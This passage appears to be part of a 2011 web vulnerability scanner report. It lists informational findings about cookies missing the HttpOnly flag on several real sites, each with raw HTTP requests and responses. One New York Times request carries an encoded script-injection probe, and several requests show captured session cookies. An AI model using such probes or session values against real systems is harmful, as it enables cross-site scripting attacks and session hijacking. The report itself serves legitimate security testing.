Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 7874
Set-Cookie: NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65e45525d5f4f58455e445a4a423660;path=/
Content-Length: 7874


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Perkins Coie Mobile Site
</title><meta name="viewport" content="width=device-width; initial-scale=1.0; user-scalable=1;" /><link rel="
...[SNIP]...
18.78. http://m.perkinscoie.com/practices/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.perkinscoie.com
Path:   /practices/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /practices/ HTTP/1.1
Host: m.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.perkinscoie.com/publications/
Cookie: __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=3820; PortletId=4737494; SiteId=3811; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=u1pig42zp4pybpu2rug2dqbl; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:54:24 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A68
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=3818; path=/
Set-Cookie: PortletId=4737094; path=/
Set-Cookie: SiteId=3811; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 37717
Content-Length: 37717


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

Services


|
Perkins Coie Mobile Site
</title><meta name="viewport" conte
...[SNIP]...
18.79. http://m.perkinscoie.com/publications/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.perkinscoie.com
Path:   /publications/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /publications/ HTTP/1.1
Host: m.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.perkinscoie.com/
Cookie: __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=3814; PortletId=4736294; SiteId=3811; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=u1pig42zp4pybpu2rug2dqbl; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:51:56 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A68
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=3820; path=/
Set-Cookie: PortletId=4737494; path=/
Set-Cookie: SiteId=3811; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 10391
Content-Length: 10391


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

Publications


|
Perkins Coie Mobile Site
</title><meta name="viewport" c
...[SNIP]...
18.80. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?file=api&v=2&key=ABQIAAAALN-P99DGUTxv0zLZ3KmoxxSpNqs40LI3jeHQjq0vt6dXRDCS4BROOzR1ECgzSqL6otikI6yLqXbiZg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=17e4fbb79758e821:TM=1305225430:LM=1305225430:S=QjzrLXBxPrkn3hUE; expires=Sat, 11-May-2013 18:37:10 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 18:37:10 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Expires: Thu, 12 May 2011 18:37:10 GMT
Content-Length: 9977

var G_INCOMPAT = false;function GScript(src) {document.write('<' + 'script src="' + src + '"' +' type="text/javascript"><' + '/script>');}function GBrowserIsCompatible() {if (G_INCOMPAT) return false;
...[SNIP]...
18.81. http://meter-svc.nytimes.com/meter.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://meter-svc.nytimes.com
Path:   /meter.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meter.js?url=http%3A%2F%2Fwww.nytimes.com%2F2010%2F08%2F22%2Fsports%2Fcycling%2F22armstrong.html%3F59261%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E223d24b026d%3D1&referer=http%3A%2F%2Fburp%2Fshow%2F7&callback=v1305230022786 HTTP/1.1
Host: meter-svc.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: RMID=de922e2c777a4dcc117c807b; nyt-m=61755AB5B621ED6279F440ECA861ED6F&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.20.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199757505:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 19:53:44 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: no-cache
Server: nginx/0.7.59
Set-Cookie: nyt-m=63287DEF2409E7B7D9BE087FA2837C71&e=i.1306900800&t=i.20&v=i.1&l=l.15.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.1.0.0.0&pr=l.4.21.0.0.0&vp=i.0&gf=l.20.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; expires=Tue, 10-May-2016 19:53:44 GMT; path=/; domain=.nytimes.com
Content-Length: 113
Connection: keep-alive

v1305230022786({"hitPaywall":false,"counted":true,"loggedIn":false,"hash":"63287DEF2409E7B7D9BE087FA2837C71"});
18.82. http://ox-d.gartner.com/w/1.0/ajs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ox-d.gartner.com
Path:   /w/1.0/ajs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/1.0/ajs?o=8647305838&pgid=2196&tg=_self&res=1920x1200x16&plg=&ch=utf-8&tz=300&c.creative=remote&url=about%3Ablank&cb=8647305838 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ox-d.gartner.com

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: OX_u=a39dc66b-8d5c-44fd-90b9-54fba514f1cf; Version=1; Expires=Fri, 11 May 2012 20:21:46 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.7.2 (participate in the frantic)
P3P: CP="CUR ADM OUR NOR STA NID"
Location: http://ox-d.gartner.com/w/1.0/ajs?o=8647305838&pgid=2196&tg=_self&res=1920x1200x16&plg=&ch=utf-8&tz=300&c.creative=remote&url=about%3Ablank&cb=8647305838&cc=1
Date: Thu, 12 May 2011 20:21:46 GMT
Content-Length: 0
Connection: close

18.83. http://pillsburylaw.app4.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pillsburylaw.app4.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: pillsburylaw.app4.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: .ASPXANONYMOUS=StsAonAvzQEkAAAAYjYwNjBlNjMtYTcyMi00NzE0LWI1NjQtNDMyYWNlNmQ3NDBj0; hubspotutk=148ff71c-54bf-42a7-b313-024966931ee5; hsfirstvisit=http%253A%252F%252Fwww.pillsburylaw.com%252F%7chttp%253A%252F%252Fwww.google.com%252Fsearch%253Fq%253DPillsbury%252BWinthrop%252BShaw%252BPittman%2526ie%253Dutf-8%2526oe%253Dutf-8%2526aq%253Dt%2526rls%253Dorg.mozilla%253Aen-US%253Aofficial%2526client%253Dfirefox-a%7c2011-05-12%252008%253A21%253A46

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Thu, 12 May 2011 16:09:01 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Set-Cookie: HUBSPOT95=521213100.0.0000; path=/
Content-Length: 796


var hsUse20Servers = true;
var hsDayEndsIn = 42658;
var hsWeekEndsIn = 301858;
var hsMonthEndsIn = 1684258;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-12 12:09
...[SNIP]...
18.84. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dc048d9159e4ae3 HTTP/1.1
Host: pixel.33across.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: 33x_ps=u%3D7708659745%3As1%3D1304431102142%3Ats%3D1304431102142

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7708659745%3As1%3D1304431102142%3Ats%3D1304431102142; Domain=.33across.com; Expires=Fri, 11-May-2012 16:11:58 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 16:11:57 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;
18.85. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=1c6323e9-0811-5464-3af4-c00f47248395&rtb=1xcfgwn0ixqhg HTTP/1.1
Host: r.openx.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:12:00 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd; expires=Sat, 11-May-2013 16:12:00 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
18.86. https://sso.gartner.com/sp/startSSO.ping  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.gartner.com
Path:   /sp/startSSO.ping

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sp/startSSO.ping?PartnerIdpId=gartneridp&TARGET=https%3A%2F%2Fmy.gartner.com%3A443%2Fportal%2FSSOServlet%3F HTTP/1.1
Host: sso.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231879633:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.4.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: PF=amkidKRQLKUfuBV9NoLdqs;Path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1132


<html>
<head>
   <title>Submit Form</title>
</head>
<body onload="javascript:document.forms[0].submit()">
<noscript>
<p>
<strong>Note:</strong> Since you
...[SNIP]...
18.87. http://u.openx.net/w/1.0/sc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://u.openx.net
Path:   /w/1.0/sc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/1.0/sc?r=http%3A%2F%2Fox-d.gartner.com%2Fw%2F1.0%2Fajs%3Fo%3D8647305838%26pgid%3D2196%26tg%3D_self%26res%3D1920x1200x16%26plg%3D%26ch%3Dutf-8%26tz%3D300%26c.creative%3Dremote%26url%3Dabout%253Ablank%26cb%3D8647305838%26cc%3D1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: u.openx.net

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: i=0549e3e5-f49b-45bc-aa95-db63c9210df3; Version=1; Expires=Fri, 11 May 2012 20:21:48 GMT; Max-Age=31536000; Domain=.openx.net; Path=/
Server: MochiWeb/1.1 WebMachine/1.7.2 (participate in the frantic)
P3P: CP="CUR ADM OUR NOR STA NID"
Location: http://u.openx.net/w/1.0/sc?r=http%3A%2F%2Fox-d.gartner.com%2Fw%2F1.0%2Fajs%3Fo%3D8647305838%26pgid%3D2196%26tg%3D_self%26res%3D1920x1200x16%26plg%3D%26ch%3Dutf-8%26tz%3D300%26c.creative%3Dremote%26url%3Dabout%253Ablank%26cb%3D8647305838%26cc%3D1&cc=1
Date: Thu, 12 May 2011 20:21:48 GMT
Content-Length: 0
Connection: close

18.88. http://vlog.leadforce1.com/bf/bf.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vlog.leadforce1.com
Path:   /bf/bf.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bf/bf.php?idsite=6246&url=http%3A%2F%2Fwww.centrifugesystems.com%2F&res=1920x1200&h=14&m=27&s=55&cookie=1&urlref=&rand=0.671025766331095&pdf=0&qt=0&realp=0&wma=0&dir=0&fla=0&java=1&gears=0&ag=1&action_name=&title=Data%20Visualization%20Software%20%E2%80%93%20Link%20%26%20Data%20Analysis%20by%20Centrifuge%20Systems&_lf1=&vt_=YTM4MWJhY2RhNDE1OWIwODIzYzA3YzE0NDAyNGRjMDk%3D HTTP/1.1
Host: vlog.leadforce1.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.centrifugesystems.com/

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 12 May 2011 19:27:57 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: CP='OTI DSP COR NID STP UNI OTPa OUR'
Set-Cookie: lf1_visitor6246=1%3DZjg1MWEzNGFmMWJkZWI5ZjdiOTEwNjYxNTkyOTY0MDM%3D%3A2%3DMTMwNTIyODQ3Nw%3D%3D%3A3%3DMTMwNTIyODQ3Ng%3D%3D%3A4%3DNjA4MDQ2NTE%3D%3A5%3DNjczMzMxMw%3D%3D; expires=Sat, 11-May-2013 19:27:57 GMT; domain=.leadforce1.com
Set-Cookie: lf1_visitor6246=deleted; expires=Wed, 12-May-2010 19:27:56 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;
18.89. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wtssdc.gartner.com
Path:   /dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif?&dcsdat=1305231539239&dcssip=www.gartner.com&dcsuri=/technology/home.jsp&WT.seg_2=000000-00&WT.tz=-5&WT.bh=15&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Technology%20Research%20%26%20Business%20Leader%20Insight%20|%20Gartner%20Inc.&WT.js=Yes&WT.jv=1.5&WT.bs=1169x938&WT.fi=No&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=173.193.214.243-3544042224.30150881.1305231539240&WT.co_f=173.193.214.243-3544042224.30150881 HTTP/1.1
Host: wtssdc.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231539240:ss=1305231539240

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Thu, 12 May 2011 20:19:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif?dcsredirect=1&dcsdat=1305231539239&dcssip=www.gartner.com&dcsuri=/technology/home.jsp&WT.seg_2=000000-00&WT.tz=-5&WT.bh=15&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Technology%20Research%20%26%20Business%20Leader%20Insight%20|%20Gartner%20Inc.&WT.js=Yes&WT.jv=1.5&WT.bs=1169x938&WT.fi=No&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=173.193.214.243-3544042224.30150881.1305231539240&WT.co_f=173.193.214.243-3544042224.30150881
Content-Length: 0
Set-Cookie: WEBTRENDS_ID=173.193.214.243-3615922224.30150881; expires=Sun, 09-May-2021 20:19:05 GMT; path=/dcs2kf7dq10000sddxi7bvt9i_6o7e
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"

18.90. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wtssdc.gartner.com
Path:   /dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif?dcsredirect=1&dcsdat=1305231539239&dcssip=www.gartner.com&dcsuri=/technology/home.jsp&WT.seg_2=000000-00&WT.tz=-5&WT.bh=15&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Technology%20Research%20%26%20Business%20Leader%20Insight%20|%20Gartner%20Inc.&WT.js=Yes&WT.jv=1.5&WT.bs=1169x938&WT.fi=No&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=173.193.214.243-3544042224.30150881.1305231539240&WT.co_f=173.193.214.243-3544042224.30150881 HTTP/1.1
Host: wtssdc.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: WEBTRENDS_ID=173.193.214.243-3615762224.30150881; MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231539240:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.1.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 10 Mar 2006 19:37:06 GMT
Accept-Ranges: bytes
ETag: "09d6037a44c61:b1d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
